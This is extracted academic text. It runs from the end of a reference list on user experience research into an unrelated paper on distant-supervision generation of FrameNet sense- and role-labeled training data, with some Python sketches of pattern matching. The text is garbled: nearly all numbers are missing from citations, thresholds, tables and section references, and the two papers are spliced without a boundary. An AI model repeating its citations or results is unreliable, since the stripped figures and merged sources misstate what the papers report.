new york: acm, – . ardito c, buono p, caivano d, costabile mf, lanzilotti r, dittrich y. . human- centered design in industry: lessons from the trenches. computer ( ): – doi . /mc. . . bak jo, nguyen k, risgaard p, stage j. . obstacles to usability evaluation in practice. in: th nordic conference on human–computer interaction building bridges— nordichi’ . new york: acm press, . balsamo s, di marco a, inverardi p, simeoni m. . model-based performance prediction in software development: a survey. ieee transactions on software engineering ( ): – doi . /tse. . . berntsson svensson r, gorschek t, regnell b, torkar r, shahrokni a, feldt r. . quality requirements in industrial practice—an extended interview study at eleven companies. ieee transactions on software engineering ( ): – doi . /tse. . . boivie i, gulliksen j, göransson b. . the lonesome cowboy: a study of the usability designer role in systems development. interacting with computers ( ): – doi . /j.intcom. . . . borg a, yong a, carlshamre p, sandahl k. . the bad conscience of requirements engineering: an investigation in real-world treatment of non-functional require- ments. in: proceedings of the rd conference on software engineering research and practice in sweden (serps’ ). – . braun v, clarke v. . using thematic analysis in psychology. qualitative research in psychology ( ): – doi . / qp oa. cajander Å, lárusdóttir mk, gulliksen j. . existing but not explicit—the user perspective in scrum projects in practice. in: proceedings of the th ifip tc kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /mc. . http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /tse. . http://dx.doi.org/ . /j.intcom. . . http://dx.doi.org/ . / qp oa http://dx.doi.org/ . /peerj-cs. international conference human–computer interaction (interact ). berlin, heidelberg: springer, – . chamberlain s, sharp h, maiden n. . towards a framework for integrating agile development and user-centred design. in: abrahamsson p, marchesi m, succi g, eds. th international conference, xp . lecture notes in computer science, oulu, finland, – . chung l, do prado leite jcs. . on non-functional requirements in software engineering. in: borgida at, chaudhri vk, giorgini p, yu e, eds. conceptual modeling: foundations and applications, ser. lecture notes in computer science. vol. . berlin heidelberg: springer, – . chung l, nixon ba, yu e, mylopoulos j. . non-functional requirements in software engineering. boston: kluwer academic publishing. desmet p, overbeeke k, tax s. . designing products with added emotional value: development and application of an approach for research through design. the design journal ( ): – doi . / . ferreira j, sharp h, robinson h. . agile development and user experience design integration as an ongoing achievement in practice. in: proceedings of the agile conference (agile ). piscataway: ieee, – . flick u. . an introduction to qualitative research. th edition. london: sage publica- tions. gerea c, herskovic v. . measuring user experience in latin america: an exploratory survey. in: proceedings of the latin american conference on human computer interaction—clihc’ . new york: acm press, – . gulliksen j, boivie i, persson j, hektor a, herulf l. . making a difference: a survey of the usability profession in sweden. 
in: proceedings of the rd nordic conference on human–computer interaction (nordichi’ ). new york: acm, – . hassenzahl m. . the thing and i: understanding the relationship between user and product. in: blythe ma, monk af, overbeeke k, wright pc, eds. funology: from usability to enjoyment. dordrecht: springer netherlands, – . hassenzahl m. . experience design: technology for all the right reasons. san francisco: morgan & claypool. hassenzahl m, burmester m, koller f. . attrakdiff: ein fragebogen zur messung wahrgenommener hedonischer und pragmatischer qualität (attraktif: a question- naire for the measurement of perceived hedonic and pragmatic quality). in: ziegler j, szwillus g, eds. mensch & computer : interaktion in bewegung. stuttgart: b.g. teubner, – . hassenzahl m, diefenbach s, göritz a. . needs, affect, and interactive products— facets of user experience. interacting with computers ( ): – doi . /j.intcom. . . . hassenzahl m, tractinsky n. . user experience—a research agenda. behaviour & information technology ( ): – doi . / . kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / http://dx.doi.org/ . /j.intcom. . . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. international organisation for standardisation (iso). . iso : software engineering—product quality—part : quality in use metrics. geneva: international organisation for standardisation. international organisation for standardisation (iso). . iso : systems and software engineering—systems and software quality requirements and evaluation (square)—system and software quality models. geneva: international organisation for standardisation. isomursu m, sirotkin a, voltti p, halonen m. . user experience design goes agile in lean transformation—a case study. in: proceedings of the agile conference (agile ). piscataway: ieee, – . jordan pw. . designing pleasurable products: an introduction to the new human factors. boca raton: crc press. karlsson l, dahlstedt Å. g, regnell b, natt och dag j, persson a. . requirements engineering challenges in market-driven software development—an interview study with practitioners. information and software technology ( ): – doi . /j.infsof. . . . kashfi p, feldt r, nilsson a, svensson rb. . evidence-based timelines for user experience software process improvement retrospectives. in: nd euromicro conference on software engineering and advanced applications. piscataway: ieee. kujala s, roto v, väänänen-vainio-mattila k, sinnelä a. . identifying hedonic factors in long-term user experience. in: proceedings of the conference on designing pleasurable products and interfaces (dppi ’ ). new york: acm, : – : . kuusinen k, väänänen-vainio-mattila k. . how to make agile ux work more efficient: management and sales perspectives. in: proceedings of the th nordic conference on human–computer interaction: making sense through design (nordichi ’ ). new york: acm, – . lanzilotti r, costabile mf, ardito c, informatica d, aldo b. . addressing usability and ux in call for tender for it products. in: proceedings of the th ifip tc international conference human–computer interaction (interact ), – . law el-c, abrahão s. . interplay between user experience (ux) evaluation and sys- tem development. international journal of human-computer studies ( ): – doi . /j.ijhcs. . . . law el-c, van schaik p, roto v. . attitudes towards user experience (ux) measurement. international journal of human-computer studies ( ): – doi . /j.ijhcs. . . . locascio j, khurana r, he y, kaye j. . 
utilizing employees as usability participants: exploring when and when not to leverage your coworkers. in: proceedings of the chi conference on human factors in computing systems. new york: acm, – . nielsen j. . usability engineering. cambridge: academic press inc. nuseibeh b, easterbrook s. . requirements engineering: a roadmap. in: proceedings of the conference on the future of software engineering–icse’ . vol. . new york: acm press, – . kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.infsof. . . http://dx.doi.org/ . /j.ijhcs. . . http://dx.doi.org/ . /j.ijhcs. . . http://dx.doi.org/ . /peerj-cs. oevad t, larsen lb. . how to reduce the ux bottleneck—train your soft- ware developers. behaviour & information technology ( ): – doi . / x. . . ovad t, larsen lb. . the prevalence of ux design in agile development processes in industry. in: proceedings of the agile conference (agile ). piscataway: ieee, – . paech b, kerlow d. . non-functional requirements engineering—quality is essential. in: proceedings of the th international working conference on requirements engineering: foundation for software quality (refsq’ ), – . rosenbaum s, rohn ja, humburg j. . a toolkit for strategic usability. in: proceed- ings of the sigchi conference on human factors in computing systems (chi’ ). new york: acm, – . runeson p, höst m. . guidelines for conducting and reporting case study re- search in software engineering. empirical software engineering ( ): – doi . /s - - - . väänänen-vainio-mattila k, roto v, hassenzahl m. . now let’s do it in practice: user experience evaluation methods in product development. in: proceedings of extended abstracts on human factors in computing systems (chi’ ). new york: acm, – . vermeeren apos, law el-c, roto v, obrist m, hoonhout j, väänänen-vainio-mattila k. . user experience evaluation methods: current state and development needs. in: proceedings of the th nordic conference on human–computer interaction extending boundaries (nordichi ’ ). new york: acm, – . wright p, mccarthy j. . experience-centered design: designers, users, and com- munities in dialogue, ser. in: synthesis lectures on human-centered informatics. san francisco: morgan & claypool. zimmermann pg. . beyond usability-measuring aspects of user experience. phd dissertation, swiss federal institute of technology zurich. kashfi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / x. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. generating training data for semantic role labeling based on label transfer from linked lexical resources silvana hartmann�, judith eckle-kohler�, iryna gurevych�‡ � ukp lab, technische universität darmstadt ‡ ukp lab, german institute for educational research http://www.ukp.tu-darmstadt.de abstract we present a new approach for generating role-labeled training data using linked lexi- cal resources, i.e., integrated lexical resources that combine several resources (e.g., word- net, framenet, wiktionary) by linking them on the sense or on the role level. unlike resource-based supervision in relation extrac- tion, we focus on complex linguistic anno- tations, more specifically framenet senses and roles. the automatically labeled train- ing data (www.ukp.tu-darmstadt.de/ knowledge-based-srl/) are evaluated on four corpora from different domains for the tasks of word sense disambiguation and seman- tic role classification. 
results show that classifiers trained on our generated data equal those resulting from a standard supervised setting. introduction in this work, we present a novel approach to automatically generate training data for semantic role labeling (srl). it follows the distant supervision paradigm and performs knowledge-based label transfer from rich external knowledge sources to large corpora. srl has been shown to improve many nlp applications that rely on a deeper understanding of semantics, such as question answering, machine translation or recent work on classifying stance and reason in online debates (hasan and ng, ) and reading comprehension (berant et al., ). even though unsupervised approaches continue to gain popularity, srl is typically still solved using supervised training on labeled data. creating such labeled data requires manual annotations by experts, resulting in corpora of highly limited size (even though crowdsourcing has been used, it is still problematic for srl labeling: the task is very complex, which results in manually adapted definitions (fossati et al., ) or constrained role sets (feizabadi and padó, )). this is especially true for the task of framenet srl, where the amount of annotated data available is small. framenet srl annotates fine-grained semantic roles in accordance with the theory of frame semantics (fillmore, ), as illustrated by the following example showing an instance of the feeling frame including two semantic roles: [he]experiencer [felt]feeling [no sense of guilt]emotion in the betrayal of personal confidence. our novel approach to training data generation for framenet srl uses the paradigm of distant supervision (mintz et al., ), which has become popular in relation extraction. in distant supervision, the overall goal is to align text and a knowledge base, using some notion of similarity. such an alignment allows us to transfer information from the knowledge base to the text, and this information can serve as labeling for supervised learning. hence, unlike semi-supervised methods, which typically employ a supervised classifier and a small number of seed instances to do bootstrap learning (yarowsky, ), distant supervision creates training data in a single run. a particular type of knowledge base relevant for distant supervision are linked lexical resources (llrs): integrated lexical resources that combine several resources (e.g., wordnet, framenet, wiktionary) by linking them on the sense or on the role level. previous approaches to generating training data for srl (fürstenau and lapata, ) do not use lexical resources apart from framenet. for the task of word sense disambiguation (wsd), recent work on automatic training data generation based on llrs has only used wordnet (cholakov et al., ), not considering other sense inventories such as framenet. our distant supervision approach for automatic training data generation employs two types of knowledge sources: llrs and linguistic knowledge formalized as rules to create data labeled with framenet senses and roles. it relies on large corpora, because we attach labels to corpus instances only sparsely.
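to make the target annotation explicit, the following minimal sketch shows one way such a frame- and role-labeled training instance could be represented; the class and field names are illustrative stand-ins rather than part of the authors' system, and the spans mirror the bracketed example above.

```python
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class RoleSpan:
    role: str              # framenet role, e.g., "Experiencer"
    span: Tuple[int, int]  # token offsets of the argument (start, end), end exclusive


@dataclass
class FrameInstance:
    tokens: List[str]
    predicate_index: int   # position of the frame-evoking verb
    frame: str             # framenet sense label, e.g., "Feeling"
    roles: List[RoleSpan]


# the running example, encoded as one training instance
example = FrameInstance(
    tokens="he felt no sense of guilt in the betrayal of personal confidence".split(),
    predicate_index=1,
    frame="Feeling",
    roles=[RoleSpan("Experiencer", (0, 1)), RoleSpan("Emotion", (2, 6))],
)
```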
we generate training data for two commonly dis- tinguished subtasks of srl: first, for disambiguation of the frame-evoking lexical element relative to the framenet sense inventory, a wsd task; and second, for argument identification and labeling of the seman- tic roles, which depends on the disambiguation result. regarding the subtask of framenet wsd, we derive abstract lexico-syntactic patterns from lexical infor- mation linked to framenet senses in an llr and recover them in large-scale corpora to create a sense (frame) labeled corpus. we address the subsequent steps of argument identification and role labeling by making use of linguistic rules and role-level links in an llr, creating a large role-labeled corpus with more than , roles. we extrinsically evaluate the quality of the auto- matically labeled corpora for frame disambiguation and role classification for verbs, using four framenet- labeled test-sets from different domains, and show that the generated training data is complementary to the framenet fulltext corpus: augmenting it with the automatically labeled data improves on using the framenet training corpus alone. we also evaluate our approach on german data to show that it gener- alizes across languages. we discuss in detail how our method relates to and complements recent devel- opments in framenet srl. the need for additional training data has also been reported for state-of-the- art systems (fitzgerald et al., ). our work has three main contributions: (i) for automatic sense labeling, we significantly extend cholakov et al. ( )’s distant supervision approach by using discriminating patterns and a different sense inventory, i.e., framenet. we show that discriminat- ing patterns can improve the quality of the automatic sense labels. (ii) we use a distant supervision ap- proach – building on llrs – to address the complex problem of training data generation for framenet role labeling, which builds upon the sense labeling in (i). (iii) our detailed evaluation and analysis show that our approach for data generation is able to gen- eralize across domains and languages. the rest of this paper is structured as follows: after introducing our approach to training data generation in section , we describe the automatic sense labeling (section ) and role classification (section ) in detail. in section we apply our approach to german data. we present related work in section and discuss our approach in relation to state-of-the-art framenet srl in section , followed by discussion and outlook in section . section concludes. knowledge-based label transfer figure : automatic training data generation – overview. our distant supervision method for generating training data for srl consists of two stages, first gen- erating sense-labeled data, then extending these to role-labeled data, as shown in fig. . both stages use large-scale corpora and llrs as knowledge sources. knowledge sources. for the first stage, pre- sented in detail in section , we use sense-level in- formation from the llr uby (llr in fig. ) and exploit the sense links between the uby versions of framenet, wordnet, wiktionary and verbnet. more specifically, we employ (i) sense examples from framenet, wordnet, and wiktionary, and (ii) verbnet information, i.e., syntactic subcategorization frames, as well as semantic roles and selectional pref- erence information of the arguments. it is important to note that the sense examples in framenet (called lexical unit examples) are a different resource than the framenet fulltext corpus. 
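as an illustration of how such sense-level links can be consumed when collecting seed material, the sketch below models a minimal lookup that gathers sense examples for one framenet verb sense from the linked resources; the identifiers and sample entries are hypothetical stand-ins and do not reflect the actual uby api or data.

```python
from collections import defaultdict

# hypothetical sense-level links: (lemma, framenet frame) -> linked senses elsewhere
SENSE_LINKS = {
    ("feel", "Feeling"): [("framenet_lu", "feel.v-Feeling"),
                          ("wordnet", "feel#v#5"),
                          ("wiktionary", "feel#Verb#3"),
                          ("verbnet", "feel-31.3")],
}

# hypothetical sense examples attached to each linked sense
SENSE_EXAMPLES = {
    ("framenet_lu", "feel.v-Feeling"): ["he felt no sense of guilt in the betrayal."],
    ("wordnet", "feel#v#5"): ["she felt resentful."],
    ("wiktionary", "feel#Verb#3"): ["i felt hungry after the long walk."],
    ("verbnet", "feel-31.3"): ["the crowd felt great joy."],
}


def seed_sentences(lemma, frame):
    """collect seed example sentences for one framenet verb sense via the llr links."""
    seeds = defaultdict(list)
    for resource, sense_id in SENSE_LINKS.get((lemma, frame), []):
        seeds[resource].extend(SENSE_EXAMPLES.get((resource, sense_id), []))
    return dict(seeds)


print(seed_sentences("feel", "Feeling"))
```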
for the second stage, presented in section , we use the llr semlink (llr in fig. ) and exploit the role-level links between verbnet semantic roles and framenet roles. semlink (bonial et al., ) contains manually curated mappings of the fine-grained framenet roles to roles in the verbnet role inventory, including more than role-level links. formalization. more formally, we can cast our distant supervision method for automatic training data generation as a knowledge-based label transfer approach. given a set x of seed instances derived from knowledge sources and a label space y, a set of labeled seed instances consists of pairs {x_i, y_i}, where x_i ∈ x and y_i ∈ y, i = 1, . . . , n. for an unlabeled instance u_j ∈ u, j = 1, . . . , m, where u is a large corpus and u ∩ x = Ø, we employ label transfer from {x_i, y_i} to u_j based on common representations r_xi and r_uj using a matching criterion c. the label y_i is transferred to u_j if c is met. for the creation of sense-labeled data, we perform pattern-based labeling, where y is the set of sense labels, r_xi and r_uj are sense patterns generated from corpus instances and from llrs including sense-level links, and c considers the similarity of the patterns based on a similarity metric. we create role-labeled data with rule-based labeling, where y is the set of role labels and r_xi and r_uj are attribute representations of roles using syntactic and semantic attributes. attribute representations are derived from parsed corpus instances and from linguistic knowledge, also including role-level links from llrs; here, c is fulfilled if the attribute representations match. experimental setup. in our distant supervision approach to training data generation, we (i) create our training data in a single run (and not iteratively) and (ii) perform sparse labeling, i.e., we need a very large corpus (e.g., unlabeled web data) in order to obtain a sufficient number of training instances. we analyze the resulting labeled corpora and evaluate them extrinsically using a classifier trained on the automatically labeled data on separate test datasets from different domains. this way, we can also show that a particular strength of our approach is to generalize across domains. in the next section we present the automatic creation of sense-labeled corpora (stage ). automatic labeling for word sense in this work, we are the first to apply distant supervision-based verb sense labeling to the framenet verb sense inventory. we extend the methodology by cholakov et al. ( ), who also exploit sense-level information from the llr uby for the automatic sense-labeling of corpora with verb senses, but use wordnet as a sense inventory. we use the same types of information and similarity metric (which we call sim in this paper), but our label space y is given by the framenet verb sense inventory (|y| = , ), and therefore we exploit , sense links from framenet to wordnet, verbnet and wiktionary. the similarity metric sim ∈ [0, 1] is based on dice's coefficient and considers the common n-grams, n = , . . . , : ( ) sim(r_xi, r_uj) = ( Σ_n |g_n(p_1) ∩ g_n(p_2)| · n ) / norm_w, where w ≥ is the size of the window around the target verb, g_n(p_i), i ∈ {1, 2}, is the set of n-grams occurring in r_xi and r_uj, and norm_w is the normalization factor defined by the sum of the maximum number of common n-grams in the window w. step a: seed pattern extraction and filtering.
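both the seed-pattern filtering described in this step and the subsequent label transfer rely on the similarity metric sim defined above. the following condensed sketch illustrates that machinery; the n-gram orders, the exact normalization factor, and the data layout (token lists and (pattern, sense, kind) triples) are our own assumptions filling in details the text leaves open, so it is an illustration of the approach rather than the authors' implementation.

```python
import random
from itertools import combinations


def ngrams(tokens, n):
    """all token n-grams of order n, as a set."""
    return {tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1)}


def sim(p1, p2, max_n=4):
    """dice-style weighted n-gram overlap between two sense patterns
    (token lists restricted to a window around the target verb);
    max_n and the normalization are assumed values."""
    overlap, norm = 0, 0
    for n in range(1, max_n + 1):
        g1, g2 = ngrams(p1, n), ngrams(p2, n)
        overlap += len(g1 & g2) * n
        norm += min(len(g1), len(g2)) * n  # assumed maximal attainable overlap
    return overlap / norm if norm else 0.0


def discriminating_filter(patterns_by_sense, f):
    """greedily discard seed-pattern pairs extracted for two different senses
    of the same verb whose similarity exceeds the filtering threshold f.
    patterns_by_sense maps a sense label to a list of (tokens, kind) seeds,
    where kind is "lsp" or "asp"."""
    dropped = set()
    for s1, s2 in combinations(patterns_by_sense, 2):
        for i, (p1, _) in enumerate(patterns_by_sense[s1]):
            for j, (p2, _) in enumerate(patterns_by_sense[s2]):
                if (s1, i) in dropped or (s2, j) in dropped:
                    continue
                if sim(p1, p2) > f:
                    dropped.update({(s1, i), (s2, j)})
    return {s: [p for i, p in enumerate(ps) if (s, i) not in dropped]
            for s, ps in patterns_by_sense.items()}


def transfer_sense_label(corpus_pattern, seeds, t):
    """collect candidate senses from the most similar seed patterns scoring
    at least t; lsps take precedence over asps on ties; return one candidate
    at random, or None so the sentence stays unlabeled (sparse labeling).
    seeds is a list of (tokens, sense, kind) triples for one target verb."""
    scored = [(sim(corpus_pattern, p), sense, kind) for p, sense, kind in seeds]
    scored = [x for x in scored if x[0] >= t]
    if not scored:
        return None
    best = max(score for score, _, _ in scored)
    top = [(sense, kind) for score, sense, kind in scored if score == best]
    lsp_senses = [sense for sense, kind in top if kind == "lsp"]
    return random.choice(lsp_senses or [sense for sense, _ in top])
```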
we call the sense patterns rxi generated from seed in- stances xi in the llr uby seed patterns and follow cholakov et al. ( ) for the generation of those seed patterns, i.e., we create lemma sense patterns (lsps), consisting of the target verb lemma and lem- matized context only, and second, abstract sense pat- terns (asps), consisting of the target verb lemma and a number of rule-based generalizations of the context words. an example of each of the sense patterns for the framenet sense feeling of the verb feel in the sense example he felt no sense of guilt in the betrayal of personal confidence is: . lsp: he feel no sense of guilt in . asp: pp feel cognition of feeling in act asps generalize to a large number of contexts which is particularly important for identifying productively used verb senses, while lsps serve to identify fixed constructions such as multiword expressions. using n-grams instead of unigrams takes word order into account, which is particularly important for verb senses, as syn- tactic and semantic properties often correlate. a drawback of cholakov et al. ( )’s method for seed pattern extraction is that it extracts a certain number of very similar (or even identical) seed pat- terns for different senses. those seed patterns may lead to noise in the sense-labeled data. to prevent this problem, we developed an optional discriminating filter that removes problematic seed patterns. the intuition behind the discriminating filter is the following: some of the asp and lsp patterns which we extract from the seed instances discriminate better between senses than others; i.e., if the same or a very similar pattern is extracted for sense wi and sense wj of a word w, i, j ∈ ( , . . . , n), n=number of senses of w, i = j, this pattern does not discriminate well, and should not be used when labeling new senses. we filter the asp and lsp patterns by comparing each pattern for sense wi to the patterns of all the other senses wj, i = j using the similarity metric sim; if we find two patterns wi, wj whose similarity score exceeds a filtering threshold f, we greedily discard them both. the filtering may increase precision at the cost of recall, because it reduces the number of seed pat- terns. since we use the approach on large corpora, we still expect sufficient recall. our results show that discriminating filtering improves the quality of the automatically labeled corpus. essentially, our discriminating filter integrates the goal of capturing sense distinctions into our approach. the same goal is pursued by corpus analysis patterns (cpa pat- terns, hanks ( )), which have been created to capture sense distinctions in word usage by combin- ing argument structures, collocations and an ontology of semantic types for arguments. in contrast to our fully automatic approach, developing cpa patterns based on corpus evidence was a lexicographic effort. the following example compares two asp patterns to a cpa pattern from popescu et al. ( ): . cpa: [[human]] | [[institution]] abandon [[ac- tivity]] | [[plan]] . asp: jj person abandon jj cognition of jj quantity . asp: person abandon communication which vvd pp jj in our abstract asp patterns look similar, as they also abstract argument fillers to semantic classes and pre- serve certain function words. step b: sense label transfer. using the ap- proach of cholakov et al. 
( ), we create sense patterns r_uj from all sentences u_j of an unlabeled corpus that contain a target verb, for instance the sentence u : "i feel strangely sad and low-spirited today" for the verb feel. for every u_j, its sense pattern r_uj is then compared to the labeled seed patterns using the similarity metric sim. from the most similar seed patterns {r_xi, y_i} that have a similarity score above a threshold t, the set of candidate labels {y_i} is extracted. the approach picks a random sense label from {y_i} and attaches it to u_j (unless t is very high, there is usually more than one candidate sense label). if an asp and an lsp receive the same similarity score, lsps get precedence over asps, i.e., the labeled sense is selected from the senses associated with the lsp. using this method, our example sentence u receives the label feeling. this approach leads to a sparse labeling of the unlabeled corpus, i.e., many unlabeled sentences are discarded because their similarity to the seed patterns is too low. it however scales well to large corpora because it requires only shallow pre-processing, as we will show in the next section: we apply our approach to a large web corpus and analyze the resulting sense-labeled corpora. . creating the sense-labeled corpus unlabeled corpora. we used parts to of the ukwac corpus (baroni et al., ) as input for the automatic sense label transfer for the verb lemmas in our test sets (see section . , test data). seed patterns. the seed patterns for step a of the sense labeling were extracted from a) the framenet example sentences, and b) sense examples from resources linked to framenet in uby, namely wordnet, wiktionary, and verbnet. without a discriminating filter, this results in more than , lsp and , asp, % and % of the total number, respectively. adding a strict discriminating filter f= . reduces the patterns to , lsp and , asp. proportionally more asp are filtered, leading to % lsp and % asp. the number of senses with patterns decreases from , to , . threshold setting. in order to determine the parameter values for the label transfer, i.e., which values for threshold t and filter f result in a high-quality training corpus, we perform an extrinsic evaluation on a development set: we use a set of automatically labeled corpora based on ukwac section generated with different threshold values to train a verb sense disambiguation (vsd) system. we evaluate precision p (the number of correct instances/number of labeled instances), recall r (the number of labeled instances/all instances), and f (harmonic mean of p and r) of the systems on the development-split fnft-dev of the framenet . fulltext corpus (fnft), used by das and smith ( ). a detailed description of the vsd system follows in the next section. we varied the thresholds of the discriminating filter f (step a) and the threshold t (step b) on the values ( . , . , . , . ), as was suggested by cholakov et al. ( ) for t. we also compare corpora with and without the discriminating filter f. to save space, we only report results with f for t = . in table . table : combinations of f and t evaluated on fnft-dev; configurations for best f , r and p in bold. as expected, increasing the pattern similarity threshold t at which a corpus sentence is labeled with a sense increases the precision at the cost of recall. similarly, employing a discriminating filter f at t= .
increases precision compared to using no filter, and leads to the best precision on the validation set. note that the discriminating filter gets stricter, i.e. discriminates more, with a lower f value. ac- cordingly, low f values lead to the highest precision of . for the strict thresholds t= . and f= . , indicating that precision-oriented applications can benefit from higher discrimination. automatically labeled corpora. the setting with the highest f in table leads to the very large sense- labeled corpus was xl. we also use f and t values with the highest precision in order to evaluate the ben- efits of the discriminating filter, leading to was l. instances senses verbs s/v i/s was xl (t= . ) . * , . , was x (t= . ) , , . was l (t= . ,f= . ) , , . fnft? , . table : sense statistics of automatically labeled corpora. the size of these corpora ranges from , to . million sense instances with an average of . to . senses per verb, compared to , verb sense instances in fnft?, fnft filtered by the verbs in our four test sets, see table . we compare was l to was x, the corpus labeled with t = . , but without filter f in order to eval- uate the impact of adding the discriminating filter. compared to the latter corpus, was l contains % fewer sense instances, but only % fewer distinct senses, and % of the senses which are also covered by was xl. the number of instances per sense is zipf-distributed with values ranging from to over , , leading to the average of , reported in table for was xl. . vsd experiments to compare the quality of our automatically sense- labeled corpora to manually labeled corpora, we per- form extrinsic evaluation in a vsd task. vsd sys- tem. we use a standard supervised setup for sense disambiguation: we extract lexical, syntactic, and se- mantic features from the various training sets and the test sets. for pre-processing, we use dkpro core (eckart de castilho and gurevych, ), e.g., stanford tokenizer, treetagger for pos tagging and lemmatization, stanfordnamedentityrecognizer for ner and stanford parser for dependency parsing. we train a logistic regression classifier in the weka implementation (hall et al., ) using the same features as cholakov et al. ( ). training corpora. we trained our vsd system on was xl and was l, and, for comparison, on the training split fnft-train of fnft . used by das and smith ( ). test data. for evaluation, we used four different framenet-labeled datasets. the statistics of the test datasets are compiled in table , a brief description of verbs senses s/v inst(s) inst(r) fate . , , masc . , , semeval . , fnft-test . , , fnft-dev . , , table : test dataset statistics on verbs; inst(s/r): number of ambiguous sense and role instances in the datasets. each dataset follows. we use the frame and role anno- tations in the semeval task evaluation and trial dataset (ruppenhofer et al., ). it consists of literature texts. the fate corpus contains frame annotations on the rte- textual entailment chal- lenge test set (burchardt and pennacchiotti, ). it is based on newspaper texts, texts from informa- tion extraction datasets such as ace, muc- , and texts from question answering datasets such as clef and trec. these two datasets were created prior to the release of framenet . . for those sets, only senses (verb-frame combinations) that still occur in framenet . and their roles were included in the evaluation. 
the masc wordsense sentence cor- pus (passonneau et al., ) is a balanced corpus that contains sense annotations for instances of words from the masc corpus. it contains word- net sense labels, we use a slightly smaller subset of verbs annotated with framenet . labels. we also evaluate on the test-split fnft-test of the framenet fulltext corpus used in das and smith ( ). . vsd results and analysis. impact of pattern filters. a comparison of results between the was corpora (first block of table ) shows that the filters in was l improve precision for three out of four test sets, which shows that stronger filtering can benefit precision-oriented applications. precision on the masc corpus is lower when us- ing a discriminating filter. due to the larger polysemy in masc – on average . senses per verb (see s/v in table ), it contains rare senses. the reduction of sense instances caused by the discriminating filter leads to some loss of instances for those senses and a lower precision on masc. analysing the results in detail for the example verb tell shows that was xl contains all senses this subset is currently not part of the masc download, but according to personal communication with the developers will be published soon. of tell in masc; was l contains of them. how- ever, the number of training instances per sense for was l can be lower by factor or more compared to was xl (e.g., tens to hundreds, hundreds to thou- sands), leading to only few instances per sense. the sparsity problem could either be solved by using a less strict filter, or by labeling additional instances from ukwac, in order to preserve more instances of the rare senses for stricter thresholds t and f. these results also show that the noise that is added to the corpora in a low-discrimination, high-recall setting will be to a certain extent drowned out by the large number of sense instances. for was xl, recall is significantly higher for all test sets, leading to a higher f . all significance scores reported in this paper are based on fisher’s exact test at significance level p< . . comparison to fnft-train. we also compare the results of our was-corpora to a vsd system trained on the reference corpus fnft-train (see table ). on semeval, precision does not deviate signifi- cantly from the fnft-train system. on fnft-test, it is significantly lower. for was xl, precision is significantly lower on fate, but significantly higher on masc. for was l the precision is similar on masc and fate. for was xl, the recall is signif- icantly higher than for fnft-train on all test sets, leading to a higher f . this is the result of the larger sense coverage of the framenet lexicon, which pro- vided the seeds for the automatic labeling. training our system directly on the framenet lexi- cal unit examples is, however, not a viable alternative: it leads to a system with similar precision our was- corpora, but very low recall (between . and . ). by using the sense examples in our seed patterns, we retain their benefits on sense coverage, and improve the system recall and f at the same time. comparative analysis. in a detailed analysis of our results, we compare the performance of the was xl and fnft-train based systems on those verbs of each test set that are evaluated for both sys- tems, i.e., the intersection it. on it, precision and f are higher for fnft-train for all test sets except masc. for masc, precision is similar, but recall is . points higher. 
for the verbs in it, the average number of training senses in was xl is two senses higher than for fnft-train. this larger sense cov- erage of the was xl is beneficial to recall on the fnft-test fate masc semeval p r f p r f p r f p r f was xl . * . * . . * . * . . * . * . . . * . was l . * . . . . * . . . * . . . * . fnft-train . . . . . . . . . . . . b-was xl . . * . . . * . . * . * . . . * . u-was xl . * . * . . * . * . . * . * . . . * . table : vsd p, r, f ; * marks significant differences to the system trained on fnft-train. masc test set which shows high polysemy. evaluating on the set difference between the sys- tems (test verbs that remain after the intersection is re- moved), we see that the lemma coverage of was xl is complementary to fnft-train. the difference dt is not empty for both systems, but the number of verbs that can be evaluated additionally for was xl is much larger than the one for fnft-train. the proportion of instances only evaluated for a specific train set to all evaluated instances ranges between % and % for was xl, and between % and % for fnft-train. combining training data. the complementary nature of the sets led us to evaluate two combinations of training sets: u-was xl consists of the union of was xl and fnft-train, b-was xl implements a backoff strategy and thus consists of fnft-train and those instances of was xl whose lemmas are not contained in the intersection with fnft-train (i.e., if fnft-train does not contain enough senses for a lemma, supplement with was xl). the third block in table shows that precision is higher or not significantly lower for b-was xl compared to fnft-train, recall and f are higher. u-was xl leads to higher recall compared to b- was xl, and allover highest f . this proves that our automatically labeled corpus was xl is com- plementary to the manually labeled fnft-train and contributes to a better coverage on diverse test sets. multiword verbs. our approach of training data generation also includes multiword verbs such as carry out. we treat those verb senses as additional senses of the head verb, for which we also create sense patterns, i.e., the sense for carry out is a specific sense of carry. as a result, we do not need to rely on additional multiword detection strategies for vsd. our was xl contains more than , sense instances of multiword verbs, of which have multiple framenet senses. we specifically evaluated the performance of our vsd system on multiwords and their head verbs from masc which contains relevant sense instances. the precision is . com- pared to . when training on fnft-train, at slightly higher coverage. while the test set is too small to provide significant results, there is an indication that the automatically labeled data also contribute to the disambiguation of multiword verbs. this analysis concludes our section on automatic sense labeling. in the next section, we will describe our method for automatically adding framenet role labels to the was-corpora. automatic labeling for semantic roles in this section, we present our linguistically informed approach to the automated labeling of framenet roles in arbitrary text. our method builds on the results of rich linguistic pre-processing including dependency parsing and uses role-level links in the llr semlink and the sense labels from section . first, a set of deterministic rules is applied to label syntactic argu- ments with verbnet semantic roles. 
